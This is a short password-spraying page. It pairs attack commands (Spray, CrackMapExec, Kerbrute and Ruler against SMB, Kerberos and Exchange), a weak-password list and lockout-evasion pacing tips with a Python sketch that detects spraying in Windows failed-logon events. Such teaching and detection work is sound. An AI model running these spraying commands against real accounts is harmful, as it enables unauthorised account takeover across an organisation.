Spray ONE password across MANY accounts. Avoids lockout by staying under the threshold per account. Common weak passwords: Welcome1, Password1, Company2024!, Season+Year.
# Using Spray (Linux):
spray.py -smb 192.168.1.10 -ul users.txt -p Welcome1 -t 1

# Using CrackMapExec:
crackmapexec smb 192.168.1.10 -u users.txt -p Welcome1 --continue-on-success

# Using Kerbrute (Kerberos spray, faster and more stealthy):
kerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt Welcome1

# Using Ruler (Exchange/OWA):
ruler --domain corp.local brute --users users.txt --passwords passwords.txt

# Safe spraying rules:
# - Check lockout policy first: net accounts /domain
# - Wait 30+ mins between sprays
# - Spray 1 password per cycle
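Because each account sees only one failure per cycle, per-account lockout counters never trip; the pattern shows up when failures are grouped by source instead. The following detection sketch is an added example, not part of the original page: the event tuple layout, thresholds, addresses and sample events are constructed assumptions (4625 and 4771 are the Windows failed-logon and Kerberos pre-authentication-failed event IDs).

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

FAILED_AUTH_IDS = {4625, 4771}  # 4625 failed logon; 4771 Kerberos pre-auth failed

def build_sample_events():
    """Constructed sample data, not real logs: (time, event_id, source, account)."""
    t0 = datetime(2024, 3, 4, 9, 0, 0)
    events = []
    for cycle_start in (t0, t0 + timedelta(minutes=35)):  # two cycles, 35 min apart
        for i in range(12):                               # one try per account
            ts = cycle_start + timedelta(seconds=3 * i)
            events.append((ts, 4771, "10.0.5.23", f"user{i:02d}"))
    for i in range(4):  # benign: one user mistyping their own password
        events.append((t0 + timedelta(minutes=5, seconds=20 * i), 4625, "10.0.7.50", "alice"))
    return sorted(events)

# Thresholds are illustrative assumptions; tune them to the domain's lockout policy.
def detect_spray(events, window=timedelta(minutes=5), min_accounts=10, max_per_account=2):
    """Flag sources failing against many distinct accounts, few tries each, in one window."""
    by_source = defaultdict(list)
    for ts, event_id, source, account in events:
        if event_id in FAILED_AUTH_IDS:
            by_source[source].append((ts, account))
    alerts = []
    for source, fails in by_source.items():
        fails.sort()
        start, suppress_until = 0, None
        for end, (ts, _) in enumerate(fails):
            while ts - fails[start][0] > window:   # slide the window forward
                start += 1
            if suppress_until is not None and ts <= suppress_until:
                continue                           # one alert per burst
            counts = Counter(acct for _, acct in fails[start:end + 1])
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                alerts.append({"source": source, "first_seen": fails[start][0],
                               "accounts": len(counts)})
                suppress_until = ts + window
    return alerts

if __name__ == "__main__":
    for alert in detect_spray(build_sample_events()):
        print(alert)
```

On the constructed data this raises one alert per spray cycle for the single source and none for the user who mistyped a password four times.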